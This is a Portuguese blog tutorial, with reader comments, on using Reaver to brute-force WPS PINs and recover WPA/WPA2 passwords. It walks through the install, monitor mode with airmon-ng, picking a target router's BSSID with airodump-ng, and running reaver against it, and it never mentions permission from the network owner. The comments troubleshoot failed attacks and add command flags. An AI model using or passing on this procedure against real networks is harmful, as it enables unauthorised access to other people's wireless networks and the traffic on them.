Usando Reaver para explorar falha do WPS e acessar redes com criptografia WPA/WPA2

Reaver foi desenvolvido para ser uma ferramenta de ataque robusta e prática contra WPS, e  foi testado com uma ampla variedade de access points e implentações de WPS. Reaver implementa um ataque de força bruta contra PINs de redes sem fios com Wifi Protected Setup (WPS) a fim de conseguir as senhas WPA/WPA2.

Na média Reaver irá conseguir a senha de acesso dos APs em texto puro em cerca de 4 a 10 horas, dependendo do AP. Na prática, irá levar metade desse tempo para adivinhar o PIN WPS correto e conseguir a senha acesso.

Instalação:
Para quem ainda não tem o reaver instalado no Backtrack basta usar o seguinte comando para instalar:
# apt-get install reaver 

Requisitos para usar o Reaver
– Estar usando Linux
– Ter uma placa wireless capaz de fazer injeção raw
– Ter uma placa wireless capaz de trabalhar em modo monitor 

Como usar:
Primeiro coloque sua placa de rede em modo monitor
# airmon-ng start wlan0

Encontre o BSSID do roteador que você quer acessar:
# airodump-ng wlan0

Se o comando acima não funcionar tente:
# airodump-ng mon0

Você irá ver uma lista de redes wireless ao seu alcance, a sua lista será parecida com essa:
Lista de redes disponiveis na area

Quando visualizar a rede desejada pressione Control+C e então copie o BSSID da mesma. A rede deve possuir encriptação WPA ou WPA2 .

Agora com o BSSID e o nome da interface que está monitorando em mãos, tudo que você precisa é iniciar o Reaver.

Executando o Reaver

# reaver -i inteface_monitorando -b bssid -vv

por exemplo:
# reaver -i mon0 -b 00:0C:42:68:57:E6 -vv

Pressione enter, sente-se e deixe o Reaver trabalhar. Reaver irá tentar uma série de PINs no roteador através de um ataque de força bruta.  Isso vai levar um bom tempo, em média o Reaver demora de 2 a 4 horas para lhe entregar a senha.

Reaver funciona muito bem em diversos roteadores, mas não necessariamente irá funcionar em todos. Você pode pausar o processo pressionando Control+C, mas o Reaver irá salvar o seu progresso e irá continuar na próxima vez que executar.

 

fonte: http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/

17 comentários para Usando Reaver para explorar falha do WPS e acessar redes com criptografia WPA/WPA2

  • leafax  disse:

    eu faço tudo certo mai aparece (0xo2)erro

  • leafax  disse:

    erro parece (0x02)

    • @mago_on  disse:

      Em qual momento aparece essa mensagem ?
      Qual SO está usando ?
      Qual modelo da sua placa wireless ?

  • Higher  disse:

    Cara tem algo de errado com o reconhecimento da encriptação de uma rede, e acho que é por causa disso que esta dando o seguinte erro:
    WARNING: Failed to associate with SSID: FARA

    No win7 quando uso o commview para escanear redes, esta rede está como encriptação wpa-psk.

    Mas no linux quando coloco a placa em modo monitor e digito airodump-ng mon0, ela está como wpa2-tkip-psk.

    E não conecta, dá essa falha aí, vc pode me ajudar ?

  • Ever  disse:

    É normal aparecer erro 02 ou 03, o problema é quando aparece erro 04, quando aparace esse erro o Reaver fica tentando o mesmo pin indefinidamente.

  • carlos  disse:

    Consegui fazer, mas o reaver trás uma senha mt grande no final… estou fazendo algo de errado? essa senha tem q descriptografar? como faze?

  • Leonardo Augusto  disse:

    Tem como conseguir o reaver para instalar no BT5 de outra maneira que naõ seja o apt-get?

  • Joao Gustavo  disse:

    cara eu faco tudo certo…ate coloco which reaver pra ver se ta instalado e esta..mas no fim aparece waintig for beacon from....... e
    warning failed to associate whith,,,,
    o que seria.

    • @mago_on  disse:

      pode ser que sua placa não esteja ou aceite trabalhar em modo monitor.

  • Guinter  disse:

    Eu tenho o pin do roteador mas não sei qual comando usar no reaver para testar esse pin e ver a chave wpa2.

  • gabriel artuzi  disse:

    alguem poderia me ajudar pq esta aparecendo este erro
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

  • gabriel artuzi  disse:

    no meu caso aparece esta mensagem de erro
    [+] Waiting for beacon from 64:66:B3:8D:84:36
    [+] Switching wls1 to channel 1
    [+] Associated with 64:66:B3:8D:84:36 (ESSID: artuzi)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    ou entao
    [+] Waiting for beacon from 00:C0:CA:18:FC:0B
    [+] Switching wls1 to channel 1
    [+] Switching wls1 to channel 2
    [+] Switching wls1 to channel 3
    [+] Switching wls1 to channel 4
    [+] Switching wls1 to channel 5
    [+] Switching wls1 to channel 6
    [+] Switching wls1 to channel 7
    [+] Switching wls1 to channel 8
    [+] Switching wls1 to channel 9
    [+] Switching wls1 to channel 10
    [+] Switching wls1 to channel 11
    se alguem puder me ajudar agradeço desde ja e obrigado.

    • Tiago Flach  disse:

      Já encontrou uma resolução para este problema gabriel??

    • foltz  disse:

      fALTOU ESPECIFICAR O CANA COM O COMANDO -c 1

      EX:”reaver -i wlan0 -c 1 -b 70:54:d2 -vv”

      • @mago_on  disse:

        no caso não foi esquecido, isso é opcional. []s

Deixe uma resposta

VocÊ pode usar tags e atributos : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">